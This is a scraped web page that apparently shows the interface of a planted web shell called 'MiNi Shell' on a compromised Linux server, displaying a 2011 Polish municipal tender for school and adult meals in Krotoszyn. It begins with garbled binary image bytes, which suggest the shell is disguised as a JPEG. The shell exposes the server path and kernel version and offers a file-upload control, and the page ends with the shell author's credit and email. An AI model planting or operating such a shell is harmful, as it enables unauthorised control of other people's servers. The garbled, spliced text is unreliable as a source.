JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111214/425634-N-2011.html

<p class="kh_header"><b>Krotoszyn: Dożywianie uczniów szkół podstawowych i  gimnazjalnych oraz innych osób na terenie miasta i gminy Krotoszyn w roku 2012.</b><br>
<b>Numer ogłoszenia: 425634 - 2011; data zamieszczenia: 14.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Krotoszynie , ul. Kobylińska 10a, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7253668, faks 062 7253668.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mgops.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostak organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie uczniów szkół podstawowych i  gimnazjalnych oraz innych osób na terenie miasta i gminy Krotoszyn w roku 2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie,  i dostarczenie własnym 
transportem  posiłków dla uczniów szkół podstawowych i gimnazjalnych i  
innych  osób na  terenie miasta Krotoszyna w   roku 2012  - Część I
Przygotowanie  i dostarczenie własnym transportem posiłków dla uczniów 
szkół podstawowych i gimnazjalnych  na  terenie gminy Krotoszyn w roku 2012
-  część II                  
Opis części zamówienia  - Część I
1.Przedmiotem zamówienia jest przygotowanie i dostarczenie do 
Zespołu Szkół Nr 2 w Krotoszynie PL. Szkolny 19   w roku  2012 
dla około 25  uczniów  obiadów ( około 4000 porcji) typu: 
mięso 100 gram
surówka 80 gram
ziemniaki 200 gram , kompot 150 ml
pozostały 1 dzień zupa( 400ml)  z wkładką mięsną z pieczywem - ok 200 gram.
lub naleśniki, placki ziemniaczane, pierogi, pyzy kluski itp. 
W cenie obiadu należy uwzględnić koszty dowozu, naczyń, obsługi.                           
2.Przygotowanie i wydanie obiadów dla około 80 dorosłych osób           
( około 21 000 porcji) 
W miesiącu styczniu, lutym, marcu, październiku , listopadzie, grudniu - 
około 80  w pozostałe miesiące dla około 30 osób. Obiady typu: 
mięso 100 gram
surówka 100 gram
ziemniaki 200 gram
pozostały 1 dzień zupa( 400ml)  z wkładką mięsną z pieczywem - ok. 200  
gram. lub naleśniki, placki ziemniaczane, pierogi, pyzy kluski itp.
Kompot, sok 150 ml we własnym lub wynajętym na własny koszt lokalu na           
terenie miasta  Krotoszyna. Lokal musi spełniać wymogi sanitarne związane z 
wydawaniem i konsumpcją na miejscu posiłków dla około 90 osób. Wszystkie 
koszty utrzymania  lokalu związane z   mediami( woda, gaz, energia) ponosi  
Wykonawca. W cenie obiadu należy uwzględnić koszty dowozu, naczyń , obsługi
Posiłki muszą być  sporządzone zgodnie z wymogami sztuki kulinarnej i 
żywienia zbiorowego. Muszą być sporządzone ze świeżych      
artykułów spożywczych posiadających aktualne terminy ważności.
Część II
1.Przedmiotem zamówienia jest przygotowanie i dostarczenie do szkół w roku 2012 obiadów ogółem dla około 30  uczniów( około 7500 porcji)  w szkołach : Szkoła Podstawowa w Biadkach  w Zespołach Szkół w:  Benicach, Chwaliszewie, Orpiszewie.
Poszczególne miejscowości  położone są  na terenie w gminy Krotoszyn w              
promieniu 50 kilometrów.
Posiłek ma być jednodaniowy, a przynajmniej 4razy w tygodniu winien być  
to posiłek  mięsny typu: 
mięso 100 gram
surówka 80 gram
ziemniaki 200 gram, kompot 150 ml.
pozostały 1 dzień zupa  z wkładką mięsną z pieczywem - ok 200 gram.
2.Przygotowanie i dostarczenie własnym transportem zgodnie z wymogami        
sanitarnymi  obiadów w boksach termoizolacyjnych wraz z jednorazowymi 
sztućcami dla około 25 uczniów ( około 5200 porcji) w szkołach na terenie    
gminy  Krotoszyn w roku 2012 w  niżej wymienionych miejscowościach:
Gorzupia, Kobierno Świnków, Lutogniew, Brzoza, Wielowieś, Roszki.
Poszczególne miejscowości  znajdują się na terenie gminy Krotoszyn w 
promieniu 50 kilometrów 
Zamawiający zastrzega, iż ilość uczniów korzystających z 
posiłków na rok  2012 może zmienić się w trakcie obowiązywania umowy i 
każdorazowo informować   będziemy o ilości posiłków, które wykonawca     
winien dostarczyć do poszczególnych   placówek. Możliwa jest również 
zmiana  placówek szkolnych do których będą dostarczane posiłki w razie 
likwidacji szkół. Posiłki winne być  dostarczone do  poszczególnych szkół 
najpóźniej do  godz.13,00. Posiłki  do szkół winne być dostarczane w 
termoizolacyjnych termosach,  aby  uczniowie  otrzymali ciepły posiłek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie  zamówień uzupełniających do 50 % wartości 
zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt 6     ustawy z dnia 29 stycznia 2004 r. Prawo   zamówień  publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.20.00-3, 55.52.40.00-9, 55.32.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości 4.000 zł. Słownie: cztery tysiące złotych. Zamawiający dopuszcza wszelkie formy wniesienia  wadium opisane w art.  45 ust. 6 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych. Wykonawca wnoszący wadium w pieniądzu  zobowiązany jest wpłacić  na konto Nr:  16 1090 1157 0000 0001 0416 6839 przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego  przyjmuje się termin uznania na rachunku zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie - warunek : w okresie ostatnich 3 lat a jeżeli okres działalności jest krótszy w tym okresie wykonał co najmniej 2 zamówienia o wartości min. 100 tys. brutto zł. PLN w zakresie usług stanowiących przedmiot  niniejszego zamówienia. Wykonawca spełni warunek niniejszego zamówienia jeżeli wykaże wykonanie w/w usług oraz przedłoży dokumenty potwierdzające, że usługi te  zostały należycie wykonane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji  finansowej zapewniającej wykonanie          
zamówienia,- warunek  wykaże posiadanie środków finansowych na podstawowym rachunku   bankowym lub zdolność kredytową w wysokości co najmniej 20 tys. złotych PLN.
Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia -
nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach
jakich żąda Zamawiający. Z dokumentów musi jasno  wynikać, że wykonawca 
spełnia warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w umowie.
Zmiana umowy może być dokonana w granicach wyznaczonych przepisami PZP, w tym art. 144 ustawy PZP, wyłącznie za zgodą obu stron w formie pisemnej pod rygorem nieważności.
Poza przypadkami określonymi w umowie, zmiany umowy będą mogły nastąpić w  
następujących okolicznościach:
-Zaistnienia po zawarciu umowy siły wyższej, przez którą należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od stron
-którego nie można było przewidzieć przed zawarciem umowy
-którego nie można było uniknąć  ani strony nie mogły zapobiec przy zachowaniu należytej staranności,
-której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej,
a)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron ( zmiana podatku VAT.)
b)zaistnienia po stronie Zamawiającego okoliczności spowodowanych sytuacją finansową, zdolnościami płatniczymi, okolicznościami, które nie  można było przewidzieć w chwili zawarcia umowy. 
c)zmiany ilości osób  uprawnionych do korzystania z posiłków</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgops.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Krotoszynie.
             ul. Kobylińska 10a  63-700 Krotoszyn
             tel. (062 ) 725 36 68 fax 725 36 68.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2011 godzina 08:00, miejsce: Miejsko-Gminny Ośrodek Pomocy Społecznej w Krotoszynie.
             ul. Kobylińska 10a  63-700 Krotoszyn  pokój nr. 3
             tel. (062 ) 725 36 68 fax 725 36 68.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com